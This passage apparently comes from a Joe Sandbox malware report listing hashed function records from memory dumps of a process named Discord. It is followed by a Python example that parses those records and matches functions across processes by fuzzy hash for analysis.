                                      • Opcode ID: 32961abd0791f8483ec627bf0cb41afd95b32a7f6aadf3860f26d79183715248
                                      • Instruction ID: b75d59a600d72db153bb2cb4ef9ad0de7805117f69a27d683bd08e912a6ec9a3
                                      • Opcode Fuzzy Hash: 32961abd0791f8483ec627bf0cb41afd95b32a7f6aadf3860f26d79183715248
                                      • Instruction Fuzzy Hash: B4711916F0D6D60EE356B77C68695F92BA1DFC622970981FBD0CDCA0E7DC0868478392
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;N_$<N_^
                                      • API String ID: 0-579182416
                                      • Opcode ID: e33ca73e1d44f59fd01dab2638409b09f0c82d64b240b760bf70cd55bcd70c59
                                      • Instruction ID: ff93b337c7e9c3e58b3f62aceb567f6394478dad579ce313548d0b3871e67881
                                      • Opcode Fuzzy Hash: e33ca73e1d44f59fd01dab2638409b09f0c82d64b240b760bf70cd55bcd70c59
                                      • Instruction Fuzzy Hash: 05512636B0964D4FD304EBACA4A69E97BB4FFC421475145FAD058CB2DADD286842CB88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2N_^
                                      • API String ID: 0-2962387604
                                      • Opcode ID: d2c66826138e38b49cddd43e4bd5cfb85bf0f475af0457ba60e2344eaabe849b
                                      • Instruction ID: bfc69c018194e3c7fccc91cdf5ca5394e8c8cd3797052f98c09c3ac9b9035000
                                      • Opcode Fuzzy Hash: d2c66826138e38b49cddd43e4bd5cfb85bf0f475af0457ba60e2344eaabe849b
                                      • Instruction Fuzzy Hash: 5B51F727F0969A4FD711E7ACA8765ED7F70EF85225B0A42F7C099DA1F3DD1424068390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2N_^
                                      • API String ID: 0-2962387604
                                      • Opcode ID: 582de223853282522399c3d4a6e5bf6c5ee0d4824afc465d29abcee3d058b178
                                      • Instruction ID: 9e00aa463d9763839bc3b2552372d756ff47b2c9f1afcc2b489aaf80a338e127
                                      • Opcode Fuzzy Hash: 582de223853282522399c3d4a6e5bf6c5ee0d4824afc465d29abcee3d058b178
                                      • Instruction Fuzzy Hash: 2F51F327F0969A4FD711E7ACA8765ED7B70EF81225B0A42F7C099DA1F3DC1824068380
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee487462c19f83999c3a2cec92d6ee09b1fe9dd0632110c42f4836a5f58f131a
                                      • Instruction ID: 349a21333c92063750a572d10cc4965c6ad4071906afddf0d821fc6fa4fe0567
                                      • Opcode Fuzzy Hash: ee487462c19f83999c3a2cec92d6ee09b1fe9dd0632110c42f4836a5f58f131a
                                      • Instruction Fuzzy Hash: EA31C472A09A8E4FDB51DBACD8755EDBBB1FF85210F4602BAC049E72F6CD242905C740
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86e2c738bd958126e835d73246f3a4ac02c28e5b8c8cf61fad08ef9df912bc46
                                      • Instruction ID: 40c26045088dfd0949058bf05c613f0d20cbd9892ae1cd778cdd3bce689d6a17
                                      • Opcode Fuzzy Hash: 86e2c738bd958126e835d73246f3a4ac02c28e5b8c8cf61fad08ef9df912bc46
                                      • Instruction Fuzzy Hash: 93510836F0965E8BDB04FBACA866AED73B1FFC4325B51427AD009C72E7CE2464418780
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1694085a8c7708a4c103290e176ab5c42b717a9bcecf1e2ccdc8a9d6ff5d29cc
                                      • Instruction ID: fae4a66b25d0215550cf1d82377fe1917e89af176798fc1a8c71c1a23b57003d
                                      • Opcode Fuzzy Hash: 1694085a8c7708a4c103290e176ab5c42b717a9bcecf1e2ccdc8a9d6ff5d29cc
                                      • Instruction Fuzzy Hash: 8441C436B19A2E8FDB44FBACD865AED77A1FFC4315B41457AD009C7296CE346442C780
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d034d8cedad19002c4a6db81f6055205a8c9d47c232b94d8bbcd2bb06bbfb3f
                                      • Instruction ID: d1e19eb4b6cba8251263871df03ee25f4d220b6cbfc7f08c73937d2658222e5f
                                      • Opcode Fuzzy Hash: 1d034d8cedad19002c4a6db81f6055205a8c9d47c232b94d8bbcd2bb06bbfb3f
                                      • Instruction Fuzzy Hash: 0D219611F1490A4BFB84BBBC586E7BC72E2EF98715F504176E51DC32D7DE28A8414382
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06160b1d12be0932a572feeb9d8220267d9f6b7a7b723f48a323aae11b653727
                                      • Instruction ID: 5b44f0e9fc334e17e6ac333f36c7116386e810abddbc4c88d8e5c814e5141f2e
                                      • Opcode Fuzzy Hash: 06160b1d12be0932a572feeb9d8220267d9f6b7a7b723f48a323aae11b653727
                                      • Instruction Fuzzy Hash: DC218035758A4D4FD744EB9CA0A69FEBF69BFC8200B8149ECD418C738ECD2869018B48
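The entries above are the report's per-function similarity records for code found in memory dumps of processes 17, 18 and 20. Two things a practitioner wants from them are a table of which processes hold executable dump regions, and which functions recur across processes: several process 18 and process 20 entries carry near-identical Instruction Fuzzy Hashes, which is what you expect when the same .NET payload is run in more than one process. The following Python is an added example, not Joe Sandbox code. It reads the first field of the .sdmp name as the process index and the fourth as the region base, both of which can be checked against the Snapshot File name and the Offset shown on the page (0x12 is 18, 0x14 is 20); treating the fifth field (0x40) as the Win32 page protection PAGE_EXECUTE_READWRITE is an assumption, and the nibble-by-nibble distance is a crude stand-in for the report's own Similarity score, whose algorithm the report does not state. The sample input is four entries copied from this report, trimmed to the fields the parser uses.

```python
"""Index the 'Memory Dump Source' entries of a Joe Sandbox report and pair
functions across processes by Instruction Fuzzy Hash. Added example, not
Joe Sandbox code; assumptions are marked in comments."""
import re
from dataclasses import dataclass

# Constructed input: four entries copied from this report (two from process 18,
# two from process 20), with the fields the parser ignores omitted.
SAMPLE = """
Memory Dump Source
• Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
• Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
• String ID:
• Opcode ID: 22eaffde5d71c1ab2e6c9668d212350830963c6432f76d18f3a358e2d8057bbd
• Instruction Fuzzy Hash: 68712916F0D6960EE356B67C64695F92BA1DFC623971981FBD0CDCA0E7DC0828478352
Memory Dump Source
• Source File: 00000012.00000002.2485943647.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
• Snapshot File: hcaresult_18_2_7ffd9b7d0000_Discord.jbxd
• String ID:
• Opcode ID: b1111266d1ee9574721b2d5fcf7ccb0531c108c3d25dccea98c2acd927cab506
• Instruction Fuzzy Hash: 97219F34B589494FD784EF68A0B19EDBF71AFC8300BA549E8E818C33CADD3869418B40
Memory Dump Source
• Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
• Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
• String ID:
• Opcode ID: 32961abd0791f8483ec627bf0cb41afd95b32a7f6aadf3860f26d79183715248
• Instruction Fuzzy Hash: B4711916F0D6D60EE356B77C68695F92BA1DFC622970981FBD0CDCA0E7DC0868478392
Strings
Memory Dump Source
• Source File: 00000014.00000002.2966372490.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
• Snapshot File: hcaresult_20_2_7ffd9b7e0000_Discord.jbxd
• String ID: ;N_$<N_^
• API String ID: 0-579182416
• Opcode ID: e33ca73e1d44f59fd01dab2638409b09f0c82d64b240b760bf70cd55bcd70c59
• Instruction Fuzzy Hash: 05512636B0964D4FD304EBACA4A69E97BB4FFC421475145FAD058CB2DADD286842CB88
"""

# Fields 1, 2 and 4 are verifiable against the page; field 5 as page protection
# is an assumption; field 3 and fields 6 to 8 are left undecoded.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp$"
)
PAGE_EXECUTE_READWRITE = 0x40  # Win32 constant


@dataclass
class FunctionEntry:
    process: int        # 1st field, hex: 0x12 -> 18, matches "hcaresult_18_2_..."
    snapshot: int       # 2nd field, hex: matches the "_2_" in the snapshot name
    base: int           # 4th field: equals the "Offset:" printed in the report
    protection: int     # 5th field: assumed to be the region's page protection
    opcode_id: str
    instruction_fuzzy: str
    string_id: str


def _build(fields):
    name = fields["Source File"].split(",")[0].strip()
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"unrecognised dump name: {name}")
    return FunctionEntry(
        process=int(m["proc"], 16), snapshot=int(m["snap"], 16),
        base=int(m["base"], 16), protection=int(m["prot"], 16),
        opcode_id=fields.get("Opcode ID", ""),
        instruction_fuzzy=fields.get("Instruction Fuzzy Hash", "").upper(),
        string_id=fields.get("String ID", ""),
    )


def parse_entries(text):
    """One FunctionEntry per 'Memory Dump Source' block; 'Key: value' bullets
    are collected, label-only lines such as 'Strings' are skipped."""
    entries, fields = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Memory Dump Source":
            if fields:
                entries.append(_build(fields))
            fields = {}
        elif fields is not None and ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    if fields:
        entries.append(_build(fields))
    return entries


def rwx_regions(entries):
    """(process, base) pairs whose dump region is assumed PAGE_EXECUTE_READWRITE."""
    return {(e.process, e.base) for e in entries if e.protection == PAGE_EXECUTE_READWRITE}


def nibble_distance(a, b):
    """Number of differing hex digits, position by position. A crude stand-in for
    the report's own Similarity score, not Joe Sandbox's algorithm."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def match_across_processes(entries, src_proc, dst_proc):
    """For each function dumped from src_proc, the closest function from dst_proc,
    as {src_opcode_id: (dst_opcode_id, distance)}."""
    dst = [e for e in entries if e.process == dst_proc and e.instruction_fuzzy]
    if not dst:
        return {}
    result = {}
    for src in (e for e in entries if e.process == src_proc and e.instruction_fuzzy):
        best = min(dst, key=lambda d: nibble_distance(src.instruction_fuzzy, d.instruction_fuzzy))
        result[src.opcode_id] = (best.opcode_id, nibble_distance(src.instruction_fuzzy, best.instruction_fuzzy))
    return result


if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    for proc, base in sorted(rwx_regions(found)):
        print(f"process {proc}: executable/writable dump region at {base:#x}")
    for src, (dst, d) in match_across_processes(found, 20, 18).items():
        print(f"{src[:12]} (proc 20) ~ {dst[:12]} (proc 18), nibble distance {d}")
```

On the four sample entries the process 20 function 32961abd... lands 10 nibbles away from the process 18 function 22eaffde..., while unrelated functions from the same dump differ in most positions, so a small threshold separates "same function, different process" from noise; on a full report, run the same matcher over every process pair that the Snapshot File names enumerate.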